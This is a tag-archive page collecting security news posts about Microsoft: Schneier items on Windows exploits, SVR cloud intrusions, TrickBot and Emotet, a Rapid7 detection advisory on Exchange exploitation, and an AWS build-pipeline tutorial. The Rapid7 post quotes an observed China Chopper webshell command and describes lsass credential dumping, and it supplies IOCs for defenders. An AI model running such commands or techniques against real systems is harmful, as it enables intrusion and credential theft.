Tag Archives: microsoft

Chinese Hackers Stole an NSA Windows Exploit in 2014

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2021/03/chinese-hackers-stole-an-nsa-windows-exploit-in-2014.html

Check Point has evidence that (probably government affiliated) Chinese hackers stole and cloned an NSA Windows hacking tool years before (probably government affiliated) Russian hackers stole and then published the same tool. Here’s the timeline:

The timeline basically seems to be, according to Check Point:

  • 2013: NSA’s Equation Group developed a set of exploits including one called EpMe that elevates one’s privileges on a vulnerable Windows system to system-administrator level, granting full control. This allows someone with a foothold on a machine to commandeer the whole box.
  • 2014-2015: China’s hacking team code-named APT31, aka Zirconium, developed Jian by, one way or another, cloning EpMe.
  • Early 2017: The Equation Group’s tools were teased and then leaked online by a team calling itself the Shadow Brokers. Around that time, Microsoft cancelled its February Patch Tuesday, identified the vulnerability exploited by EpMe (CVE-2017-0005), and fixed it in a bumper March update. Interestingly enough, Lockheed Martin was credited as alerting Microsoft to the flaw, suggesting it was perhaps used against an American target.
  • Mid 2017: Microsoft quietly fixed the vulnerability exploited by the leaked EpMo exploit.

Lots of news articles about this.

Indiscriminate Exploitation of Microsoft Exchange Servers (CVE-2021-24085)

Post Syndicated from Andrew Christian original https://blog.rapid7.com/2021/03/02/indiscriminate-exploitation-of-microsoft-exchange-servers-cve-2021-24085/

Indiscriminate Exploitation of Microsoft Exchange Servers (CVE-2021-24085)

The following blog post was co-authored by Andrew Christian and Brendan Watters.

Beginning Feb. 27, 2021, Rapid7’s Managed Detection and Response (MDR) team has observed a notable increase in the automated exploitation of vulnerable Microsoft Exchange servers to upload a webshell granting attackers remote access. The suspected vulnerability being exploited is a cross-site request forgery (CSRF) vulnerability: The likeliest culprit is CVE-2021-24085, an Exchange Server spoofing vulnerability released as part of Microsoft’s February 2021 Patch Tuesday advisory, though other CVEs may also be at play (e.g., CVE-2021-26855, CVE-2021-26865, CVE-2021-26857).

The following China Chopper command was observed multiple times beginning Feb. 27 using the same DigitalOcean source IP (165.232.154.116):

cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&net group "Exchange Organization administrators" administrator /del /domain&echo [S]&cd&echo [E]

Exchange or other systems administrators who see this command—or any other China Chopper command in the near future—should look for the following in IIS logs:

  • 165.232.154.116 (the source IP of the requests)
  • /ecp/y.js
  • /ecp/DDI/DDIService.svc/GetList

Indicators of compromise (IOCs) from the attacks we have observed are consistent with IOCs for publicly available exploit code targeting CVE-2021-24085 released by security researcher Steven Seeley last week, shortly before indiscriminate exploitation began. After initial exploitation, attackers drop an ASP eval webshell before (usually) executing procdump against lsass.exe in order to grab all the credentials from the box. It would also be possible to then clean some indicators of compromise from the affected machine[s]. We have included a section on CVE-2021-24085 exploitation at the end of this document.

Exchange servers are frequent, high-value attack targets whose patch rates often lag behind attacker capabilities. Rapid7 Labs has identified nearly 170,000 Exchange servers vulnerable to CVE-2021-24085 on the public internet:

Indiscriminate Exploitation of Microsoft Exchange Servers (CVE-2021-24085)

Rapid7 recommends that Exchange customers apply Microsoft’s February 2021 updates immediately. InsightVM and Nexpose customers can assess their exposure to CVE-2021-24085 and other February Patch Tuesday CVEs with vulnerability checks. InsightIDR provides existing coverage for this vulnerability via our out-of-the-box China Chopper Webshell Executing Commands detection, and will alert you about any suspicious activity. View this detection in the Attacker Tool section of the InsightIDR Detection Library.

CVE-2021-24085 exploit chain

As part of the PoC for CVE-2021-24085, the attacker will search for a specific token using a request to /ecp/DDI/DDIService.svc/GetList. If that request is successful, the PoC moves on to writing the desired token to the server’s filesystem with the request /ecp/DDI/DDIService.svc/SetObject. At that point, the token is available for downloading directly. The PoC uses a download request to /ecp/poc.png (though the name could be anything) and may be recorded in the IIS logs themselves attached to the IP of the initial attack.

Indicators of compromise would include the requests to both /ecp/DDI/DDIService.svc/GetList and /ecp/DDI/DDIService.svc/SetObject, especially if those requests were associated with an odd user agent string like python. Because the PoC utilizes aSetObject to write the token o the server’s filesystem in a world-readable location, it would be beneficial for incident responders to examine any files that were created around the time of the requests, as one of those files could be the access token and should be removed or placed in a secure location. It is also possible that responders could discover the file name in question by checking to see if the original attacker’s IP downloaded any files.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Twelve-Year-Old Vulnerability Found in Windows Defender

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2021/02/twelve-year-old-vulnerability-found-in-windows-defender.html

Researchers found, and Microsoft has patched, a vulnerability in Windows Defender that has been around for twelve years. There is no evidence that anyone has used the vulnerability during that time.

The flaw, discovered by researchers at the security firm SentinelOne, showed up in a driver that Windows Defender — renamed Microsoft Defender last year — uses to delete the invasive files and infrastructure that malware can create. When the driver removes a malicious file, it replaces it with a new, benign one as a sort of placeholder during remediation. But the researchers discovered that the system doesn’t specifically verify that new file. As a result, an attacker could insert strategic system links that direct the driver to overwrite the wrong file or even run malicious code.

It isn’t unusual that vulnerabilities lie around for this long. They can’t be fixed until someone finds them, and people aren’t always looking.

SVR Attacks on Microsoft 365

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2021/01/svr-attacks-on-microsoft-365.html

FireEye is reporting the current known tactics that the SVR used to compromise Microsoft 365 cloud data as part of its SolarWinds operation:

Mandiant has observed UNC2452 and other threat actors moving laterally to the Microsoft 365 cloud using a combination of four primary techniques:

  • Steal the Active Directory Federation Services (AD FS) token-signing certificate and use it to forge tokens for arbitrary users (sometimes described as Golden SAML). This would allow the attacker to authenticate into a federated resource provider (such as Microsoft 365) as any user, without the need for that user’s password or their corresponding multi-factor authentication (MFA) mechanism.
  • Modify or add trusted domains in Azure AD to add a new federated Identity Provider (IdP) that the attacker controls. This would allow the attacker to forge tokens for arbitrary users and has been described as an Azure AD backdoor.
  • Compromise the credentials of on-premises user accounts that are synchronized to Microsoft 365 that have high privileged directory roles, such as Global Administrator or Application Administrator.
  • Backdoor an existing Microsoft 365 application by adding a new application or service principal credential in order to use the legitimate permissions assigned to the application, such as the ability to read email, send email as an arbitrary user, access user calendars, etc.

Lots of details here, including information on remediation and hardening.

The more we learn about the this operation, the more sophisticated it becomes.

In related news, MalwareBytes was also targeted.

US Cyber Command and Microsoft Are Both Disrupting TrickBot

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/10/us-cyber-command-and-microsoft-are-both-disrupting-trickbot.html

Earlier this month, we learned that someone is disrupting the TrickBot botnet network.

Over the past 10 days, someone has been launching a series of coordinated attacks designed to disrupt Trickbot, an enormous collection of more than two million malware-infected Windows PCs that are constantly being harvested for financial data and are often used as the entry point for deploying ransomware within compromised organizations.

On Sept. 22, someone pushed out a new configuration file to Windows computers currently infected with Trickbot. The crooks running the Trickbot botnet typically use these config files to pass new instructions to their fleet of infected PCs, such as the Internet address where hacked systems should download new updates to the malware.

But the new configuration file pushed on Sept. 22 told all systems infected with Trickbot that their new malware control server had the address 127.0.0.1, which is a “localhost” address that is not reachable over the public Internet, according to an analysis by cyber intelligence firm Intel 471.

A few days ago, the Washington Post reported that it’s the work of US Cyber Command:

U.S. Cyber Command’s campaign against the Trickbot botnet, an army of at least 1 million hijacked computers run by Russian-speaking criminals, is not expected to permanently dismantle the network, said four U.S. officials, who spoke on the condition of anonymity because of the matter’s sensitivity. But it is one way to distract them at least for a while as they seek to restore operations.

The network is controlled by “Russian speaking criminals,” and the fear is that it will be used to disrupt the US election next month.

The effort is part of what Gen. Paul Nakasone, the head of Cyber Command, calls “persistent engagement,” or the imposition of cumulative costs on an adversary by keeping them constantly engaged. And that is a key feature of CyberCom’s activities to help protect the election against foreign threats, officials said.

Here’s General Nakasone talking about persistent engagement.

Microsoft is also disrupting Trickbot:

We disrupted Trickbot through a court order we obtained as well as technical action we executed in partnership with telecommunications providers around the world. We have now cut off key infrastructure so those operating Trickbot will no longer be able to initiate new infections or activate ransomware already dropped into computer systems.

[…]

We took today’s action after the United States District Court for the Eastern District of Virginia granted our request for a court order to halt Trickbot’s operations.

During the investigation that underpinned our case, we were able to identify operational details including the infrastructure Trickbot used to communicate with and control victim computers, the way infected computers talk with each other, and Trickbot’s mechanisms to evade detection and attempts to disrupt its operation. As we observed the infected computers connect to and receive instructions from command and control servers, we were able to identify the precise IP addresses of those servers. With this evidence, the court granted approval for Microsoft and our partners to disable the IP addresses, render the content stored on the command and control servers inaccessible, suspend all services to the botnet operators, and block any effort by the Trickbot operators to purchase or lease additional servers.

To execute this action, Microsoft formed an international group of industry and telecommunications providers. Our Digital Crimes Unit (DCU) led investigation efforts including detection, analysis, telemetry, and reverse engineering, with additional data and insights to strengthen our legal case from a global network of partners including FS-ISAC, ESET, Lumen’s Black Lotus Labs, NTT and Symantec, a division of Broadcom, in addition to our Microsoft Defender team. Further action to remediate victims will be supported by internet service providers (ISPs) and computer emergency readiness teams (CERTs) around the world.

This action also represents a new legal approach that our DCU is using for the first time. Our case includes copyright claims against Trickbot’s malicious use of our software code. This approach is an important development in our efforts to stop the spread of malware, allowing us to take civil action to protect customers in the large number of countries around the world that have these laws in place.

Brian Krebs comments:

In legal filings, Microsoft argued that Trickbot irreparably harms the company “by damaging its reputation, brands, and customer goodwill. Defendants physically alter and corrupt Microsoft products such as the Microsoft Windows products. Once infected, altered and controlled by Trickbot, the Windows operating system ceases to operate normally and becomes tools for Defendants to conduct their theft.”

This is a novel use of trademark law.

Vulnerability Finding Using Machine Learning

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/04/vulnerability_f.html

Microsoft is training a machine-learning system to find software bugs:

At Microsoft, 47,000 developers generate nearly 30 thousand bugs a month. These items get stored across over 100 AzureDevOps and GitHub repositories. To better label and prioritize bugs at that scale, we couldn’t just apply more people to the problem. However, large volumes of semi-curated data are perfect for machine learning. Since 2001 Microsoft has collected 13 million work items and bugs. We used that data to develop a process and machine learning model that correctly distinguishes between security and non-security bugs 99 percent of the time and accurately identifies the critical, high priority security bugs, 97 percent of the time.

News article.

I wrote about this in 2018:

The problem of finding software vulnerabilities seems well-suited for ML systems. Going through code line by line is just the sort of tedious problem that computers excel at, if we can only teach them what a vulnerability looks like. There are challenges with that, of course, but there is already a healthy amount of academic literature on the topic — and research is continuing. There’s every reason to expect ML systems to get better at this as time goes on, and some reason to expect them to eventually become very good at it.

Finding vulnerabilities can benefit both attackers and defenders, but it’s not a fair fight. When an attacker’s ML system finds a vulnerability in software, the attacker can use it to compromise systems. When a defender’s ML system finds the same vulnerability, he or she can try to patch the system or program network defenses to watch for and block code that tries to exploit it.

But when the same system is in the hands of a software developer who uses it to find the vulnerability before the software is ever released, the developer fixes it so it can never be used in the first place. The ML system will probably be part of his or her software design tools and will automatically find and fix vulnerabilities while the code is still in development.

Fast-forward a decade or so into the future. We might say to each other, “Remember those years when software vulnerabilities were a thing, before ML vulnerability finders were built into every compiler and fixed them before the software was ever released? Wow, those were crazy years.” Not only is this future possible, but I would bet on it.

Getting from here to there will be a dangerous ride, though. Those vulnerability finders will first be unleashed on existing software, giving attackers hundreds if not thousands of vulnerabilities to exploit in real-world attacks. Sure, defenders can use the same systems, but many of today’s Internet of Things (IoT) systems have no engineering teams to write patches and no ability to download and install patches. The result will be hundreds of vulnerabilities that attackers can find and use.

Microsoft Buys Corp.com

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/04/microsoft_buys_.html

A few months ago, Brian Krebs told the story of the domain corp.com, and how it is basically a security nightmare:

At issue is a problem known as “namespace collision,” a situation where domain names intended to be used exclusively on an internal company network end up overlapping with domains that can resolve normally on the open Internet.

Windows computers on an internal corporate network validate other things on that network using a Microsoft innovation called Active Directory, which is the umbrella term for a broad range of identity-related services in Windows environments. A core part of the way these things find each other involves a Windows feature called “DNS name devolution,” which is a kind of network shorthand that makes it easier to find other computers or servers without having to specify a full, legitimate domain name for those resources.

For instance, if a company runs an internal network with the name internalnetwork.example.com, and an employee on that network wishes to access a shared drive called “drive1,” there’s no need to type “drive1.internalnetwork.example.com” into Windows Explorer; typing “\\drive1\” alone will suffice, and Windows takes care of the rest.

But things can get far trickier with an internal Windows domain that does not map back to a second-level domain the organization actually owns and controls. And unfortunately, in early versions of Windows that supported Active Directory — Windows 2000 Server, for example — the default or example Active Directory path was given as “corp,” and many companies apparently adopted this setting without modifying it to include a domain they controlled.

Compounding things further, some companies then went on to build (and/or assimilate) vast networks of networks on top of this erroneous setting.

Now, none of this was much of a security concern back in the day when it was impractical for employees to lug their bulky desktop computers and monitors outside of the corporate network. But what happens when an employee working at a company with an Active Directory network path called “corp” takes a company laptop to the local Starbucks?

Chances are good that at least some resources on the employee’s laptop will still try to access that internal “corp” domain. And because of the way DNS name devolution works on Windows, that company laptop online via the Starbucks wireless connection is likely to then seek those same resources at “corp.com.”

In practical terms, this means that whoever controls corp.com can passively intercept private communications from hundreds of thousands of computers that end up being taken outside of a corporate environment which uses this “corp” designation for its Active Directory domain.

Microsoft just bought it, so it wouldn’t fall into the hands of any bad actors:

In a written statement, Microsoft said it acquired the domain to protect its customers.

“To help in keeping systems protected we encourage customers to practice safe security habits when planning for internal domain and network names,” the statement reads. “We released a security advisory in June of 2009 and a security update that helps keep customers safe. In our ongoing commitment to customer security, we also acquired the Corp.com domain.”

Emotet Malware Causes Physical Damage

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/04/emotat_malware_.html

Microsoft is reporting that an Emotet malware infection shut down a network by causing computers to overheat and then crash.

The Emotet payload was delivered and executed on the systems of Fabrikam — a fake name Microsoft gave the victim in their case study — five days after the employee’s user credentials were exfiltrated to the attacker’s command and control (C&C) server.

Before this, the threat actors used the stolen credentials to deliver phishing emails to other Fabrikam employees, as well as to their external contacts, with more and more systems getting infected and downloading additional malware payloads.

The malware further spread through the network without raising any red flags by stealing admin account credentials authenticating itself on new systems, later used as stepping stones to compromise other devices.

Within 8 days since that first booby-trapped attachment was opened, Fabrikam’s entire network was brought to its knees despite the IT department’s efforts, with PCs overheating, freezing, and rebooting because of blue screens, and Internet connections slowing down to a crawl because of Emotet devouring all the bandwidth.

The infection mechanism was one employee opening a malicious attachment to a phishing email. I can’t find any information on what kind of attachment.

Building Windows containers with AWS CodePipeline and custom actions

Post Syndicated from Dmitry Kolomiets original https://aws.amazon.com/blogs/devops/building-windows-containers-with-aws-codepipeline-and-custom-actions/

Dmitry Kolomiets, DevOps Consultant, Professional Services

AWS CodePipeline and AWS CodeBuild are the primary AWS services for building CI/CD pipelines. AWS CodeBuild supports a wide range of build scenarios thanks to various built-in Docker images. It also allows you to bring in your own custom image in order to use different tools and environment configurations. However, there are some limitations in using custom images.

Considerations for custom Docker images:

  • AWS CodeBuild has to download a new copy of the Docker image for each build job, which may take longer time for large Docker images.
  • AWS CodeBuild provides a limited set of instance types to run the builds. You might have to use a custom image if the build job requires higher memory, CPU, graphical subsystems, or any other functionality that is not part of the out-of-the-box provided Docker image.

Windows-specific limitations

  • AWS CodeBuild supports Windows builds only in a limited number of AWS regions at this time.
  • AWS CodeBuild executes Windows Server containers using Windows Server 2016 hosts, which means that build containers are huge—it is not uncommon to have an image size of 15 GB or more (with .NET Framework SDK installed). Windows Server 2019 containers, which are almost half as small, cannot be used due to host-container mismatch.
  • AWS CodeBuild runs build jobs inside Docker containers. You should enable privileged mode in order to build and publish Linux Docker images as part of your build job. However, DIND is not supported on Windows and, therefore, AWS CodeBuild cannot be used to build Windows Server container images.

The last point is the critical one for microservice type of applications based on Microsoft stacks (.NET Framework, Web API, IIS). The usual workflow for this kind of applications is to build a Docker image, push it to ECR and update ECS / EKS cluster deployment.

Here is what I cover in this post:

  • How to address the limitations stated above by implementing AWS CodePipeline custom actions (applicable for both Linux and Windows environments).
  • How to use the created custom action to define a CI/CD pipeline for Windows Server containers.

CodePipeline custom actions

By using Amazon EC2 instances, you can address the limitations with Windows Server containers and enable Windows build jobs in the regions where AWS CodeBuild does not provide native Windows build environments. To accommodate the specific needs of a build job, you can pick one of the many Amazon EC2 instance types available.

The downside of this approach is additional management burden—neither AWS CodeBuild nor AWS CodePipeline support Amazon EC2 instances directly. There are ways to set up a Jenkins build cluster on AWS and integrate it with CodeBuild and CodeDeploy, but these options are too “heavy” for the simple task of building a Docker image.

There is a different way to tackle this problem: AWS CodePipeline provides APIs that allow you to extend a build action though custom actions. This example demonstrates how to add a custom action to offload a build job to an Amazon EC2 instance.

Here is the generic sequence of steps that the custom action performs:

  • Acquire EC2 instance (see the Notes on Amazon EC2 build instances section).
  • Download AWS CodePipeline artifacts from Amazon S3.
  • Execute the build command and capture any errors.
  • Upload output artifacts to be consumed by subsequent AWS CodePipeline actions.
  • Update the status of the action in AWS CodePipeline.
  • Release the Amazon EC2 instance.

Notice that most of these steps are the same regardless of the actual build job being executed. However, the following parameters will differ between CI/CD pipelines and, therefore, have to be configurable:

  • Instance type (t2.micro, t3.2xlarge, etc.)
  • AMI (builds could have different prerequisites in terms of OS configuration, software installed, Docker images downloaded, etc.)
  • Build command line(s) to execute (MSBuild script, bash, Docker, etc.)
  • Build job timeout

Serverless custom action architecture

CodePipeline custom build action can be implemented as an agent component installed on an Amazon EC2 instance. The agent polls CodePipeline for build jobs and executes them on the Amazon EC2 instance. There is an example of such an agent on GitHub, but this approach requires installation and configuration of the agent on all Amazon EC2 instances that carry out the build jobs.

Instead, I want to introduce an architecture that enables any Amazon EC2 instance to be a build agent without additional software and configuration required. The architecture diagram looks as follows:

Serverless custom action architecture

There are multiple components involved:

  1. An Amazon CloudWatch Event triggers an AWS Lambda function when a custom CodePipeline action is to be executed.
  2. The Lambda function retrieves the action’s build properties (AMI, instance type, etc.) from CodePipeline, along with location of the input artifacts in the Amazon S3 bucket.
  3. The Lambda function starts a Step Functions state machine that carries out the build job execution, passing all the gathered information as input payload.
  4. The Step Functions flow acquires an Amazon EC2 instance according to the provided properties, waits until the instance is up and running, and starts an AWS Systems Manager command. The Step Functions flow is also responsible for handling all the errors during build job execution and releasing the Amazon EC2 instance once the Systems Manager command execution is complete.
  5. The Systems Manager command runs on an Amazon EC2 instance, downloads CodePipeline input artifacts from the Amazon S3 bucket, unzips them, executes the build script, and uploads any output artifacts to the CodePipeline-provided Amazon S3 bucket.
  6. Polling Lambda updates the state of the custom action in CodePipeline once it detects that the Step Function flow is completed.

The whole architecture is serverless and requires no maintenance in terms of software installed on Amazon EC2 instances thanks to the Systems Manager command, which is essential for this solution. All the code, AWS CloudFormation templates, and installation instructions are available on the GitHub project. The following sections provide further details on the mentioned components.

Custom Build Action

The custom action type is defined as an AWS::CodePipeline::CustomActionType resource as follows:

  Ec2BuildActionType: 
    Type: AWS::CodePipeline::CustomActionType
    Properties: 
      Category: !Ref CustomActionProviderCategory
      Provider: !Ref CustomActionProviderName
      Version: !Ref CustomActionProviderVersion
      ConfigurationProperties: 
        - Name: ImageId 
          Description: AMI to use for EC2 build instances.
          Key: true 
          Required: true
          Secret: false
          Queryable: false
          Type: String
        - Name: InstanceType
          Description: Instance type for EC2 build instances.
          Key: true 
          Required: true
          Secret: false
          Queryable: false
          Type: String
        - Name: Command
          Description: Command(s) to execute.
          Key: true 
          Required: true
          Secret: false
          Queryable: false
          Type: String 
        - Name: WorkingDirectory 
          Description: Working directory for the command to execute.
          Key: true 
          Required: false
          Secret: false
          Queryable: false
          Type: String 
        - Name: OutputArtifactPath 
          Description: Path of the file(-s) or directory(-es) to use as custom action output artifact.
          Key: true 
          Required: false
          Secret: false
          Queryable: false
          Type: String 
      InputArtifactDetails: 
        MaximumCount: 1
        MinimumCount: 0
      OutputArtifactDetails: 
        MaximumCount: 1
        MinimumCount: 0 
      Settings: 
        EntityUrlTemplate: !Sub "https://${AWS::Region}.console.aws.amazon.com/systems-manager/documents/${RunBuildJobOnEc2Instance}"
        ExecutionUrlTemplate: !Sub "https://${AWS::Region}.console.aws.amazon.com/states/home#/executions/details/{ExternalExecutionId}"

The custom action type is uniquely identified by Category, Provider name, and Version.

Category defines the stage of the pipeline in which the custom action can be used, such as build, test, or deploy. Check the AWS documentation for the full list of allowed values.

Provider name and Version are the values used to identify the custom action type in the CodePipeline console or AWS CloudFormation templates. Once the custom action type is installed, you can add it to the pipeline, as shown in the following screenshot:

Adding custom action to the pipeline

The custom action type also defines a list of user-configurable properties—these are the properties identified above as specific for different CI/CD pipelines:

  • AMI Image ID
  • Instance Type
  • Command
  • Working Directory
  • Output artifacts

The properties are configurable in the CodePipeline console, as shown in the following screenshot:

Custom action properties

Note the last two settings in the Custom Action Type AWS CloudFormation definition: EntityUrlTemplate and ExecutionUrlTemplate.

EntityUrlTemplate defines the link to the AWS Systems Manager document that carries over the build actions. The link is visible in AWS CodePipeline console as shown in the following screenshot:

Custom action's EntityUrlTemplate link

ExecutionUrlTemplate defines the link to additional information related to a specific execution of the custom action. The link is also visible in the CodePipeline console, as shown in the following screenshot:

Custom action's ExecutionUrlTemplate link

This URL is defined as a link to the Step Functions execution details page, which provides high-level information about the custom build step execution, as shown in the following screenshot:

Custom build step execution

This page is a convenient visual representation of the custom action execution flow and may be useful for troubleshooting purposes as it gives an immediate access to error messages and logs.

The polling Lambda function

The Lambda function polls CodePipeline for custom actions when it is triggered by the following CloudWatch event:

  source: 
    - "aws.codepipeline"
  detail-type: 
    - "CodePipeline Action Execution State Change"
  detail: 
    state: 
      - "STARTED"

The event is triggered for every CodePipeline action started, so the Lambda function should verify if, indeed, there is a custom action to be processed.

The rest of the lambda function is trivial and relies on the following APIs to retrieve or update CodePipeline actions and deal with instances of Step Functions state machines:

CodePipeline API

AWS Step Functions API

You can find the complete source of the Lambda function on GitHub.

Step Functions state machine

The following diagram shows complete Step Functions state machine. There are three main blocks on the diagram:

  • Acquiring an Amazon EC2 instance and waiting while the instance is registered with Systems Manager
  • Running a Systems Manager command on the instance
  • Releasing the Amazon EC2 instance

Note that it is necessary to release the Amazon EC2 instance in case of error or exception during Systems Manager command execution, relying on Fallback States to guarantee that.

You can find the complete definition of the Step Function state machine on GitHub.

Step Functions state machine

Systems Manager Document

The AWS Systems Manager Run Command does all the magic. The Systems Manager agent is pre-installed on AWS Windows and Linux AMIs, so no additional software is required. The Systems Manager run command executes the following steps to carry out the build job:

  1. Download input artifacts from Amazon S3.
  2. Unzip artifacts in the working folder.
  3. Run the command.
  4. Upload output artifacts to Amazon S3, if any; this makes them available for the following CodePipeline stages.

The preceding steps are operating-system agnostic, and both Linux and Windows instances are supported. The following code snippet shows the Windows-specific steps.

You can find the complete definition of the Systems Manager document on GitHub.

mainSteps:
  - name: win_enable_docker
    action: aws:configureDocker
    inputs:
      action: Install

  # Windows steps
  - name: windows_script
    precondition:
      StringEquals: [platformType, Windows]
    action: aws:runPowerShellScript
    inputs:
      runCommand:
        # Ensure that if a command fails the script does not proceed to the following commands
        - "$ErrorActionPreference = \"Stop\""

        - "$jobDirectory = \"{{ workingDirectory }}\""
        # Create temporary folder for build artifacts, if not provided
        - "if ([string]::IsNullOrEmpty($jobDirectory)) {"
        - "    $parent = [System.IO.Path]::GetTempPath()"
        - "    [string] $name = [System.Guid]::NewGuid()"
        - "    $jobDirectory = (Join-Path $parent $name)"
        - "    New-Item -ItemType Directory -Path $jobDirectory"
                # Set current location to the new folder
        - "    Set-Location -Path $jobDirectory"
        - "}"

        # Download/unzip input artifact
        - "Read-S3Object -BucketName {{ inputBucketName }} -Key {{ inputObjectKey }} -File artifact.zip"
        - "Expand-Archive -Path artifact.zip -DestinationPath ."

        # Run the build commands
        - "$directory = Convert-Path ."
        - "$env:PATH += \";$directory\""
        - "{{ commands }}"
        # We need to check exit code explicitly here
        - "if (-not ($?)) { exit $LASTEXITCODE }"

        # Compress output artifacts, if specified
        - "$outputArtifactPath  = \"{{ outputArtifactPath }}\""
        - "if ($outputArtifactPath) {"
        - "    Compress-Archive -Path $outputArtifactPath -DestinationPath output-artifact.zip"
                # Upload compressed artifact to S3
        - "    $bucketName = \"{{ outputBucketName }}\""
        - "    $objectKey = \"{{ outputObjectKey }}\""
        - "    if ($bucketName -and $objectKey) {"
                    # Don't forget to encrypt the artifact - CodePipeline bucket has a policy to enforce this
        - "        Write-S3Object -BucketName $bucketName -Key $objectKey -File output-artifact.zip -ServerSideEncryption aws:kms"
        - "    }"
        - "}"
      workingDirectory: "{{ workingDirectory }}"
      timeoutSeconds: "{{ executionTimeout }}"

CI/CD pipeline for Windows Server containers

Once you have a custom action that offloads the build job to the Amazon EC2 instance, you may approach the problem stated at the beginning of this blog post: how to build and publish Windows Server containers on AWS.

With the custom action installed, the solution is quite straightforward. To build a Windows Server container image, you need to provide the value for Windows Server with Containers AMI, the instance type to use, and the command line to execute, as shown in the following screenshot:

Windows Server container custom action properties

This example executes the Docker build command on a Windows instance with the specified AMI and instance type, using the provided source artifact. In real life, you may want to keep the build script along with the source code and push the built image to a container registry. The following is a PowerShell script example that not only produces a Docker image but also pushes it to AWS ECR:

# Authenticate with ECR
Invoke-Expression -Command (Get-ECRLoginCommand).Command

# Build and push the image
docker build -t <ecr-repository-url>:latest .
docker push <ecr-repository-url>:latest

return $LASTEXITCODE

You can find a complete example of the pipeline that produces the Windows Server container image and pushes it to Amazon ECR on GitHub.

Notes on Amazon EC2 build instances

There are a few ways to get Amazon EC2 instances for custom build actions. Let’s take a look at a couple of them below.

Start new EC2 instance per job and terminate it at the end

This is a reasonable default strategy that is implemented in this GitHub project. Each time the pipeline needs to process a custom action, you start a new Amazon EC2 instance, carry out the build job, and terminate the instance afterwards.

This approach is easy to implement. It works well for scenarios in which you don’t have many builds and/or builds take some time to complete (tens of minutes). In this case, the time required to provision an instance is amortized. Conversely, if the builds are fast, instance provisioning time could be actually longer than the time required to carry out the build job.

Use a pool of running Amazon EC2 instances

There are cases when it is required to keep builder instances “warm”, either due to complex initialization or merely to reduce the build duration. To support this scenario, you could maintain a pool of always-running instances. The “acquisition” phase takes a warm instance from the pool and the “release” phase returns it back without terminating or stopping the instance. A DynamoDB table can be used as a registry to keep track of “busy” instances and provide waiting or scaling capabilities to handle high demand.

This approach works well for scenarios in which there are many builds and demand is predictable (e.g. during work hours).

Use a pool of stopped Amazon EC2 instances

This is an interesting approach, especially for Windows builds. All AWS Windows AMIs are generalized using a sysprep tool. The important implication of this is that the first start time for Windows EC2 instances is quite long: it could easily take more than 5 minutes. This is generally unacceptable for short-living build jobs (if your build takes just a minute, it is annoying to wait 5 minutes to start the instance).

Interestingly, once the Windows instance is initialized, subsequent starts take less than a minute. To utilize this, you could create a pool of initialized and stopped Amazon EC2 instances. In this case, for the acquisition phase, you start the instance, and when you need to release it, you stop or hibernate it.

This approach provides substantial improvements in terms of build start-up time.

The downside is that you reuse the same Amazon EC2 instance between the builds—it is not completely clean environment. Build jobs have to be designed to expect the presence of artifacts from the previous executions on the build instance.

Using an Amazon EC2 fleet with spot instances

Another variation of the previous strategies is to use Amazon EC2 Fleet to make use of cost-efficient spot instances for your build jobs.

Amazon EC2 Fleet makes it possible to combine on-demand instances with spot instances to deliver cost-efficient solution for your build jobs. On-demand instances can provide the minimum required capacity and spot instances provide a cost-efficient way to improve performance of your build fleet.

Note that since spot instances could be terminated at any time, the Step Functions workflow has to support Amazon EC2 instance termination and restart the build on a different instance transparently for CodePipeline.

Limits and Cost

The following are a few final thoughts.

Custom action timeouts

The default maximum execution time for CodePipeline custom actions is one hour. If your build jobs require more than an hour, you need to request a limit increase for custom actions.

Cost of running EC2 build instances

Custom Amazon EC2 instances could be even more cost effective than CodeBuild for many scenarios. However, it is difficult to compare the total cost of ownership of a custom-built fleet with CodeBuild. CodeBuild is a fully managed build service and you pay for each minute of using the service. In contrast, with Amazon EC2 instances you pay for the instance either per hour or per second (depending on instance type and operating system), EBS volumes, Lambda, and Step Functions. Please use the AWS Simple Monthly Calculator to get the total cost of your projected build solution.

Cleanup

If you are running the above steps as a part of workshop / testing, then you may delete the resources to avoid any further charges to be incurred. All resources are deployed as part of CloudFormation stack, so go to the Services, CloudFormation, select the specific stack and click delete to remove the stack.

Conclusion

The CodePipeline custom action is a simple way to utilize Amazon EC2 instances for your build jobs and address a number of CodePipeline limitations.

With AWS CloudFormation template available on GitHub you can import the CodePipeline custom action with a simple Start/Terminate instance strategy into your account and start using the custom action in your pipelines right away.

The CodePipeline custom action with a simple Start/Terminate instance strategy is available on GitHub as an AWS CloudFormation stack. You could import the stack to your account and start using the custom action in your pipelines right away.

An example of the pipeline that produces Windows Server containers and pushes them to Amazon ECR can also be found on GitHub.

I invite you to clone the repositories to play with the custom action, and to make any changes to the action definition, Lambda functions, or Step Functions flow.

Feel free to ask any questions or comments below, or file issues or PRs on GitHub to continue the discussion.

Critical Windows Vulnerability Discovered by NSA

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/01/critical_window.html

Yesterday’s Microsoft Windows patches included a fix for a critical vulnerability in the system’s crypto library.

A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates.

An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider.

A successful exploit could also allow the attacker to conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software.

That’s really bad, and you should all patch your system right now, before you finish reading this blog post.

This is a zero-day vulnerability, meaning that it was not detected in the wild before the patch was released. It was discovered by security researchers. Interestingly, it was discovered by NSA security researchers, and the NSA security advisory gives a lot more information about it than the Microsoft advisory does.

Exploitation of the vulnerability allows attackers to defeat trusted network connections and deliver executable code while appearing as legitimately trusted entities. Examples where validation of trust may be impacted include:

  • HTTPS connections
  • Signed files and emails
  • Signed executable code launched as user-mode processes

